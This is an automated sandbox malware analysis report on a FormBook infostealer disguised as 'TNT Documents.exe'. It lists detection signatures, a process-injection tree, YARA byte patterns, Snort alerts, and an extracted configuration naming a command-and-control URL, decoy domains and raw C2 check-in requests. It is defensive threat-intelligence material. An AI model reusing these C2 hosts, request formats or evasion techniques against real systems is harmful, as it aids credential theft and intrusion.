Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report TNT Documents.exe

Overview

General Information

Sample Name:TNT Documents.exe
Analysis ID:532859
MD5:f943d9ee79559042bfff9b4e55270cfa
SHA1:7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256:2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
Tags:exeFormbookTNT
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TNT Documents.exe (PID: 4548 cmdline: "C:\Users\user\Desktop\TNT Documents.exe" MD5: F943D9EE79559042BFFF9B4E55270CFA)
    • TNT Documents.exe (PID: 6400 cmdline: {path} MD5: F943D9EE79559042BFFF9B4E55270CFA)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6268 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 1148 cmdline: /c del "C:\Users\user\Desktop\TNT Documents.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.TNT Documents.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.TNT Documents.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.TNT Documents.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        7.0.TNT Documents.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.TNT Documents.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.floridanratraining.com/how6/"], "decoy": ["wealthcabana.com", "fourfortyfourcreations.com", "cqqcsy.com", "bhwzjd.com", "niftyfashionrewards.com", "andersongiftemporium.com", "smarttradingcoin.com", "ilarealty.com", "sherrywine.net", "fsecg.info", "xoti.top", "pirosconsulting.com", "fundapie.com", "bbgm4egda.xyz", "legalfortmyers.com", "improvizy.com", "yxdyhs.com", "lucky2balls.com", "panelmall.com", "davenportkartway.com", "springfieldlottery.com", "pentagonpublishers.com", "icanmakeyoufamous.com", "40m2k.com", "projectcentered.com", "webfactory.agency", "metronixmedical.com", "dalingtao.xyz", "functionalsoft.com", "klopert77.com", "cortepuroiberico.com", "viavelleiloes.online", "bamedia.online", "skolicalunjo.com", "kayhardy.com", "excellentappraisers.com", "sademakale.com", "zbycsb.com", "empirejewelss.com", "coached.info", "20215414.online", "dazzlehide.com", "swickstyle.com", "specialtyplastics.online", "noordinarysenior.com", "bluinfo.digital", "chuxiaoxin.xyz", "adwin-estate.com", "girlwithaglow.com", "auctions.email", "topekasecurestorage.com", "mountain-chicken.com", "lhdtrj.com", "mhtqph.club", "solatopotato.com", "mecitiris.com", "hotrodathangtrungquoc.com", "gapteknews.com", "mantraexchange.online", "cinematiccarpenter.com", "wozka.xyz", "car-tech.tech", "jssatchell.media", "joyokanji-cheer.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TNT Documents.exeReversingLabs: Detection: 46%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.TNT Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.TNT Documents.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.349024537.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.331135577.000000000F905000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524379332.0000000003A30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.523498302.0000000003310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361357634.00000000014F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.361164513.00000000010D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.524461205.0000000003A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290851774.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.specialtyplastics.online/how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRdAvira URL Cloud: Label: malware
          Source: http://www.cortepuroiberico.com/how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRdAvira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: TNT Documents.exeJoe Sandbox ML: detected
          Source: 7.2.TNT Documents.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.TNT Documents.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.TNT Documents.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.TNT Documents.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TNT Documents.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: TNT Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B103E0
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B10494
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B103D1
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then pop edi7_2_0040C3AE
          Source: C:\Users\user\Desktop\TNT Documents.exeCode function: 4x nop then pop edi7_2_00415681
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi17_2_0331C3AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi17_2_03325681

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49794 -> 51.255.30.106:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49820 -> 119.18.54.99:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49822 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49827 -> 158.69.116.156:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.metronixmedical.com
          Source: C:\Windows\explorer.exeDomain query: www.specialtyplastics.online
          Source: C:\Windows\explorer.exeNetwork Connect: 51.255.30.106 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 119.18.54.99 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cortepuroiberico.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.coached.info
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.floridanratraining.com/how6/
          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1Host: www.cortepuroiberico.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1Host: www.specialtyplastics.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=eO7AK5UTSuqTcoXAE4JKPt5tOBv6nnmPk0M2G0ISpIO4jWwGwHlgDwMnGXB5SfKol3UegXCZpg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.metronixmedical.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /how6/?iN9tFB=ViiEyPWfYSojbIItq3CvR44gsAi5K3j61FSCtvXBJNhPIgkqJAzuFuyRGTnTAJ9C7DX1GVbTZg==&4h=7n_DRJGxnRd HTTP/1.1Host: www.coached.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.17.116.163 209.17.116.163
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 17:59:48 GMTContent-Type: text/htmlContent-Length: 275ETag: "61a4f026-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: TNT Documents.exe, 00000000.00000003.256409196.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.comx
          Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000B.00000000.339769433.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.319305560.0000000006840000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.302126756.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: TNT Documents.exe, 00000000.00000003.264583046.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264654507.000000000548D000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.264398711.000000000548D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265542932.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265913845.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265491333.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265612150.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265991532.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265777624.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265683380.0000000005482000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.265846476.0000000005482000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF(
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comI.TTF
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomo?
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: TNT Documents.exe, 00000000.00000003.267034850.0000000005476000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitud
          Source: TNT Documents.exe, 00000000.00000003.292077416.0000000005470000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000002.299918720.0000000005470000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: TNT Documents.exe, 00000000.00000003.256034110.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256133822.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.255970673.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256207995.00000000054AD000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.256191173.00000000054AD000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
          Source: TNT Documents.exe, 00000000.00000003.258709539.0000000005476000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258597321.0000000005474000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.c
          Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnG
          Source: TNT Documents.exe, 00000000.00000003.257969438.0000000005473000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna
          Source: TNT Documents.exe, 00000000.00000003.257895168.0000000005473000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnaX
          Source: TNT Documents.exe, 00000000.00000003.258154475.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258083706.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258199310.0000000005481000.00000004.00000001.sdmp, TNT Documents.exe, 00000000.00000003.258119764.0000000005481000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnar
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: TNT Documents.exe, 00000000.00000002.300203663.0000000006682000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
